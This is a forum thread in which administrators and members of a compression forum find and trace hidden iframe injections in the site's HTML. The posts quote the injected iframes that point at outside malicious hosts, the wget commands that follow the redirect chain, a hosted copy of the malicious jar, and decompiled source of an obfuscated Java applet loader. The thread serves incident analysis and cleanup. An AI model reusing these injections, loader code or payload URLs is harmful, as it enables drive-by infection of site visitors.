Results 1 to 17 of 17

Thread: site being injected?

  1. #1
    Member
    Join Date
    May 2008
    Location
    HK
    Posts
    160
    Thanks
    4
    Thanked 25 Times in 15 Posts

    site being injected?

    I found this in forum HTML source:
    Code:
    	<div style='display:none'><iframe width='9' height='6' src='http://htc.hdblog.it/mcache/z.php' frameborder='0'scrolling='no'></iframe></div>
    
    <div style='display:none'><iframe width='9' height='6' src='http://t-tapp.com/od.php' frameborder='0'

  2. #2
    Administrator Shelwien's Avatar
    Join Date
    May 2008
    Location
    Kharkov, Ukraine
    Posts
    4,013
    Thanks
    302
    Thanked 1,328 Times in 759 Posts
    thanks, removed it.
    wonder if its the server problem or VB problem... somehow it gets hacked too frequently

  3. #3
    Expert
    Matt Mahoney's Avatar
    Join Date
    May 2008
    Location
    Melbourne, Florida, USA
    Posts
    3,257
    Thanks
    307
    Thanked 797 Times in 489 Posts
    I checked with wget under Linux. z.php returns an empty file. od.php gives 404 error.

  4. #4
    Member
    Join Date
    May 2008
    Location
    HK
    Posts
    160
    Thanks
    4
    Thanked 25 Times in 15 Posts
    and in the tail of HTML, there is:
    Code:
    <img src="http://encode.su/piwik.php?idsite=13
    as the syntax is wrong, I wonder if it is injected.

  5. #5
    Administrator Shelwien's Avatar
    Join Date
    May 2008
    Location
    Kharkov, Ukraine
    Posts
    4,013
    Thanks
    302
    Thanked 1,328 Times in 759 Posts
    @Matt: it checks user-agent, try "wget -U Mozilla http://htc.hdblog.it/mcache/z.php"

    @roytam1: its an image, so no problem either way.

  6. #6
    Expert
    Matt Mahoney's Avatar
    Join Date
    May 2008
    Location
    Melbourne, Florida, USA
    Posts
    3,257
    Thanks
    307
    Thanked 797 Times in 489 Posts
    You're right.
    Code:
    matt@matt-Latitude-E6510:~$ wget -U Mozilla http://htc.hdblog.it/mcache/z.php
    --2012-06-07 09:18:52--  http://htc.hdblog.it/mcache/z.php
    Resolving htc.hdblog.it... 93.95.219.51
    Connecting to htc.hdblog.it|93.95.219.51|:80... connected.
    HTTP request sent, awaiting response... 200 OK
    Length: unspecified [text/html]
    Saving to: `z.php'
    
        [ <=>                                   ] 132         --.-K/s   in 0s      
    
    2012-06-07 09:18:52 (14.0 MB/s) - `z.php' saved [132]
    
    matt@matt-Latitude-E6510:~$ cat z.php
    <div></div>
    <iframe src='http://ididididi.in/index.php?showtopic=149040' width='1px' height='1px' frameborder='0' script=1></iframe>
    
    matt@matt-Latitude-E6510:~$ wget -U Mozilla http://ididididi.in/index.php?showtopic=149040
    --2012-06-07 09:20:20--  http://ididididi.in/index.php?showtopic=149040
    Resolving ididididi.in... 37.59.136.60
    Connecting to ididididi.in|37.59.136.60|:80... connected.
    HTTP request sent, awaiting response... 404 Not Found
    2012-06-07 09:20:21 ERROR 404: Not Found.
    
    matt@matt-Latitude-E6510:~$ wget -U Mozilla http://ididididi.in/index.php
    --2012-06-07 09:20:50--  http://ididididi.in/index.php
    Resolving ididididi.in... 37.59.136.60
    Connecting to ididididi.in|37.59.136.60|:80... connected.
    HTTP request sent, awaiting response... 404 Not Found
    2012-06-07 09:20:51 ERROR 404: Not Found.

  7. #7
    Administrator Shelwien's Avatar
    Join Date
    May 2008
    Location
    Kharkov, Ukraine
    Posts
    4,013
    Thanks
    302
    Thanked 1,328 Times in 759 Posts
    Next one just checks more things, I tried
    Code:
    wget -U "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:13.0) Gecko/20100101 Firefox/13.0" "--referer=http://htc.hdblog.it/mcache/z.php" "http://ididididi.in/index.php?showtopic=149040"
    and got
    Code:
    <body>
    <applet code='Atomic.class' archive='getfile.php?i=4&key=e4ef1304f1603c40dfd373c5e90ee40e' width='1' height='37'>
    <param name="dest" value="lxxt>33mhmhmhmhm2mr3pseh2tltCwls{jsvyqAexs">
    </applet>
    </body>
    So then it gets this: http://nishi.dreamhosters.com/u/getfile.jar
    Then you can download jad from http://www.varaneckas.com/jad/
    and apply it to Atomic.class etc
    and get
    Code:
    public class Atomic extends Applet
    {
    
        public Atomic()
        {
        }
    
        public static byte[] Tokk(String ccqsf)
        {
            byte xasgqe[] = new byte[ccqsf.length() / 2];
            int ncvnwe = 0;
            for(int i = 0; i < ccqsf.length() / 2; i++)
                xasgqe[i] = Integer.decode((new StringBuilder()).append("0x").append(ccqsf.substring(i * 2, (i + 1) * 2)).toString()).byteValue();
    
            return xasgqe;
        }
    
        public void init()
        {
            try
            {
                ClassLoader iiiokmn = getClass().getClassLoader();
                byte euwedvb[] = Tokk(Taoa.tae);
                int aas = 0;
                Taoa.ionf = getParameter(Stuc.nngw);
                ObjectInputStream wojdbv = new ObjectInputStream(new ByteArrayInputStream(euwedvb));
                Object kkfrr[] = (Object[])(Object[])wojdbv.readObject();
                Rami bbwtd[] = (Rami[])(Rami[])kkfrr[0];
                Solos mmwweq = new Solos();
                mmwweq.Soya(kkfrr, iiiokmn);
                aas++;
                String stop = "";
                Rami.Jeloi(21, 22, bbwtd[0]);
            }
            catch(Exception e) { }
        }
    }
    etc etc.

  8. #8
      webmaster's Avatar
    Join Date
    Jun 2010
    Location
    Saint-Petersburg, Russia
    Posts
    70
    Thanks
    12
    Thanked 53 Times in 24 Posts
    yes, vb problem
    Attached Thumbnails Attached Thumbnails Click image for larger version. 

Name:	256lp-hpsuperdome.jpg 
Views:	352 
Size:	170.4 KB 
ID:	1961  

  9. #9
    The Founder encode's Avatar
    Join Date
    May 2006
    Location
    Moscow, Russia
    Posts
    4,020
    Thanks
    407
    Thanked 410 Times in 157 Posts
    CANNOT UPLOAD A PICTURE!!! - 400 Bad Request

    Edit Post -> Go Advanced - not works!!!

  10. #10
    Member
    Join Date
    May 2008
    Location
    HK
    Posts
    160
    Thanks
    4
    Thanked 25 Times in 15 Posts
    NOD32 detects Iframe.B.Gen when loading "http://www.flepstudio.org/od.php"

    Code:
    	<div class="underblock"></div>
    </li>
    		</ul>
    	</div>
    	
    	<script type="text/javascript">
    	<!--
    	vbphrase['doubleclick_forum_markread'] = "Double-click this icon to mark this forum and its contents as read";
    	init_forum_readmarker_system();
    	//-->
    	</script>
    	<div style='display:none'><iframe width='9' height='6' src='http://www.flepstudio.org/od.php' frameborder='0' scrolling='no'></iframe></div>
    
     
     
    <div id="footer" class="floatcontainer footer">
    BTW this javascript is malformed in the main page:
    Code:
    	<link rel="stylesheet" type="text/css" href="clientscript/vbulletin_css/style00002l/tagcloud.css?d=1341663682" />
    
            <!--[if lt IE 8]><link rel="stylesheet" type="text/css" href="clientscript/vbulletin_css/style00002l/sidebar-ie.css?d=1341663682" /><![endif]-->
    	<script type="text/javascript">
    	<!--
    		document.write('<script type="text/javascript" src="' + yuipath + '/animation/animation-min.js?v=420"></script>');
    		var sidebar_align = 'right';
    		var content_container_margin = parseInt('290px');
    		var sidebar_width = parseInt('270px');
    	//-->
    	</script>
    the "</script>" should change to "<\/script>" in document.write().

  11. #11
    Administrator Shelwien's Avatar
    Join Date
    May 2008
    Location
    Kharkov, Ukraine
    Posts
    4,013
    Thanks
    302
    Thanked 1,328 Times in 759 Posts
    thanks for reporting, i removed it.

  12. #12
    Programmer schnaader's Avatar
    Join Date
    May 2008
    Location
    Hessen, Germany
    Posts
    620
    Thanks
    269
    Thanked 245 Times in 123 Posts
    Avast antivirus keeps warning me about "http://luroa.info/index.php" at the moment, there seems to be some JavaScript injection going on again. UrlQuery (http://urlquery.net/report.php?id=11751) reports 3 alerts, with some suspicious looking JavaScript Eval/Write details.
    http://schnaader.info
    Damn kids. They're all alike.

  13. #13
    Administrator Shelwien's Avatar
    Join Date
    May 2008
    Location
    Kharkov, Ukraine
    Posts
    4,013
    Thanks
    302
    Thanked 1,328 Times in 759 Posts
    deleted "<div style='display:none'><iframe width='9' height='6' src='http://www.flepstudio.org/od.php' frameborder='0' scrolling='no'></iframe></div>"

    didn't find "luroa.info" though; maybe its linked from that; please check?

  14. #14
    Programmer schnaader's Avatar
    Join Date
    May 2008
    Location
    Hessen, Germany
    Posts
    620
    Thanks
    269
    Thanked 245 Times in 123 Posts
    Yes, that was the source of the problem. Avast is not complaining anymore and the new urlQuery report (http://urlquery.net/report.php?id=116502) is clean. Thanks for the quick fix.
    http://schnaader.info
    Damn kids. They're all alike.

  15. #15
    Member
    Join Date
    Jun 2009
    Location
    Kraków, Poland
    Posts
    1,498
    Thanks
    26
    Thanked 135 Times in 103 Posts
    As an unlogged user I'm seeing some suspicious links in the page footer of subforums, ie links are visible on bottom of the page, but not on the main page.

  16. #16
    The Founder encode's Avatar
    Join Date
    May 2006
    Location
    Moscow, Russia
    Posts
    4,020
    Thanks
    407
    Thanked 410 Times in 157 Posts
    Quote Originally Posted by Piotr Tarsa View Post
    As an unlogged user I'm seeing some suspicious links in the page footer of subforums, ie links are visible on bottom of the page, but not on the main page.
    It's an advertisement from webmaster. Domain name is not free, hosting is not free either. No one donated even a dollar... So, this thing keeps forum alive!

  17. #17
    Member
    Join Date
    Jun 2009
    Location
    Kraków, Poland
    Posts
    1,498
    Thanks
    26
    Thanked 135 Times in 103 Posts
    OK, thanks for explanations.

Similar Threads

  1. Forum malware injected? avast warning
    By schnaader in forum The Off-Topic Lounge
    Replies: 15
    Last Post: 12th April 2012, 02:09
  2. Idea to make new site about data compression
    By Piotr Tarsa in forum Data Compression
    Replies: 1
    Last Post: 14th August 2009, 21:22
  3. HEART OF COMPRESSION - New Winturtle site
    By Nania Francesco in forum Data Compression
    Replies: 4
    Last Post: 14th May 2008, 23:29

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •